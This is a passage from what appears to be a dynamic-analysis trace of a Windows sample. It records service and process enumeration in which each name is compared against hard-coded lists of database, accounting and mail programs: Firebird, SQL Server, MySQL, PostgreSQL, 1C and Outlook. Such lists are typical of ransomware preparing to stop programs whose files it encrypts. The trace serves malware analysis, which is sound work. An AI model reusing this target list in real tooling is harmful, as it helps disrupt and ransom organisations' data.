dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4eee78, cbBufSize=0xa08, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4eee78, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0265.952] CloseServiceHandle (hSCObject=0x42759a8) returned 1 [0265.952] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0265.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0265.952] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0265.952] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0265.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0265.952] lstrlenW (lpString="AudioSrv") returned 8 [0265.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0265.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0265.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0265.953] lstrlenW (lpString="BFE") returned 3 [0265.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0265.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0265.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0265.953] lstrlenW (lpString="CscService") returned 10 [0265.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0265.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0265.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0265.953] lstrlenW (lpString="DcomLaunch") returned 10 [0265.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0265.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0265.953] lstrlenW (lpString="Dhcp") returned 4 [0265.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0265.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0265.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0265.953] lstrlenW (lpString="Dnscache") returned 8 [0265.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0265.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0265.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0265.953] lstrlenW (lpString="eventlog") returned 8 [0265.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0265.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0265.953] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0265.953] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0265.954] lstrlenW (lpString="EventSystem") returned 11 [0265.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0265.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0265.954] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0265.954] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0265.954] lstrlenW (lpString="gpsvc") returned 5 [0265.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0265.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0265.954] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0265.954] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0265.954] lstrlenW (lpString="lmhosts") returned 7 [0265.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0265.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0265.954] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0265.954] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0265.954] lstrlenW (lpString="MMCSS") returned 5 [0265.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0265.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0265.954] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0265.954] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0265.954] lstrlenW (lpString="nsi") returned 3 [0265.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0265.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0265.954] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0265.954] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0265.954] lstrlenW (lpString="PlugPlay") returned 8 [0265.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0265.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0265.954] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0265.954] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0265.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0265.954] lstrlenW (lpString="Power") returned 5 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0265.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0265.955] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0265.955] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0265.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0265.955] lstrlenW (lpString="ProfSvc") returned 7 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0265.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0265.955] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0265.955] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0265.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0265.955] lstrlenW (lpString="RpcEptMapper") returned 12 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0265.955] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0265.955] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0265.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0265.955] lstrlenW (lpString="RpcSs") returned 5 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0265.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0265.955] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0265.955] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0265.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0265.955] lstrlenW (lpString="SamSs") returned 5 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0265.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0265.955] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0265.955] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0265.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0265.955] lstrlenW (lpString="Schedule") returned 8 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0265.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0265.955] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0265.955] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0265.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0265.955] lstrlenW (lpString="SENS") returned 4 [0265.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0265.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0265.956] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0265.956] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0265.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0265.956] lstrlenW (lpString="ShellHWDetection") returned 16 [0265.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0265.956] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0265.956] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0265.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0265.956] lstrlenW (lpString="Spooler") returned 7 [0265.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0265.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0265.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0265.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0265.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0265.956] lstrlenW (lpString="Themes") returned 6 [0265.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0265.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0265.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0265.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0265.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0265.956] lstrlenW (lpString="UxSms") returned 5 [0265.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0265.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0265.956] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0265.956] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0265.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0265.956] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eee78 | out: hHeap=0x4a0000) returned 1 [0265.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x304 [0265.958] Process32FirstW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.958] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x48, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0265.958] lstrlenW (lpString="System") returned 6 [0265.958] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0265.958] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0265.958] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0265.958] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0265.958] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0265.958] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0265.958] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0265.958] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0265.959] lstrlenW (lpString="smss.exe") returned 8 [0265.959] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0265.959] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.959] lstrlenW (lpString="csrss.exe") returned 9 [0265.959] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.959] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.959] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.959] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.959] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.959] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.959] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0265.959] lstrlenW (lpString="wininit.exe") returned 11 [0265.960] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0265.960] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0265.960] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0265.960] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0265.960] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0265.960] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0265.960] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0265.960] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0265.960] lstrlenW (lpString="csrss.exe") returned 9 [0265.960] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0265.960] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0265.960] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0265.960] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0265.960] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0265.960] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0265.960] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0265.960] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0265.960] lstrlenW (lpString="winlogon.exe") returned 12 [0265.960] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0265.960] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0265.960] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0265.961] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0265.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0265.961] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0265.961] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0265.961] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0265.961] lstrlenW (lpString="services.exe") returned 12 [0265.961] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0265.961] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0265.961] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0265.961] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0265.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0265.961] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0265.961] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0265.961] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0265.961] lstrlenW (lpString="lsass.exe") returned 9 [0265.961] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0265.961] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0265.961] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0265.961] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0265.961] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0265.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0265.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0265.962] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0265.962] lstrlenW (lpString="lsm.exe") returned 7 [0265.962] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0265.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0265.962] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0265.962] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0265.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0265.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0265.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0265.962] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.962] lstrlenW (lpString="svchost.exe") returned 11 [0265.962] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.962] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.962] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.962] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.962] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.962] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.962] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.962] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.963] lstrlenW (lpString="svchost.exe") returned 11 [0265.963] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.963] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.963] lstrlenW (lpString="svchost.exe") returned 11 [0265.963] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.963] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.963] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.964] lstrlenW (lpString="svchost.exe") returned 11 [0265.964] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.964] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0265.964] lstrlenW (lpString="svchost.exe") returned 11 [0265.964] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0265.964] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0265.964] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0265.965] lstrlenW (lpString="audiodg.exe") returned 11 [0265.965] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0265.965] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0265.965] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0265.965] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0265.965] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0265.965] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0265.965] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0265.965] Process32NextW (in: hSnapshot=0x304, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 